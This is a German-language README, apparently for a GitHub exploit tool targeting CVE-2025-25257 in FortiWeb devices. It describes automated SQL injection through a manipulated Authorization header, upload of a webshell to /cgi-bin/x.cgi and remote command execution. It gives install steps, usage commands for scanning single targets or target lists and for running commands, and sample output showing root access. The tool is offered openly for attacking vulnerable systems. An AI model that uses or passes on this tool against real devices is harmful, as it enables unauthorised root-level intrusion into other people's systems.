
Python-basiertes Exploit-Tool für CVE-2025-25257 in FortiWeb. Es automatisiert die SQL-Injection-Erkennung, den Webshell-Upload und die Remote-Befehlsausführung auf verwundbaren Zielen.
Ein Python-basiertes Tool zur Überprüfung und Ausnutzung der Schwachstelle CVE-2025-25257 in FortiWeb-Geräten. Diese Schwachstelle ermöglicht SQL-Injection und Remote-Codeausführung durch einen manipulierten Authorization-Header.
CVE-2025-25257 ist eine kritische Schwachstelle in FortiWeb-Geräten, die Folgendes ermöglicht:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)Ein einzelnes Ziel überprüfen:
python3 vuln_check.py -t https://target.com
Mehrere Ziele aus einer Datei überprüfen:
python3 vuln_check.py -l target.txt
exp.py)Befehle auf einem angreifbaren Ziel ausführen:
python3 exp.py -t https://target.com -c "id"
vuln_check.py – Haupt-Schwachstellen-Checker und Exploitexp.py – Tool zur Befehlsausführung für angreifbare Zieletarget.txt – Beispielhafte Zielliste (durch eigene ersetzen)vuln.txt – Ausgabedatei mit angreifbaren Zielen (nach dem Scan erstellt)/api/fabric/device/status aus/cgi-bin/x.cgi zu schreibenDas Tool erzeugt eine Datei vuln.txt mit folgendem Inhalt:
Beispielausgabe:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
credit:0xbigshaq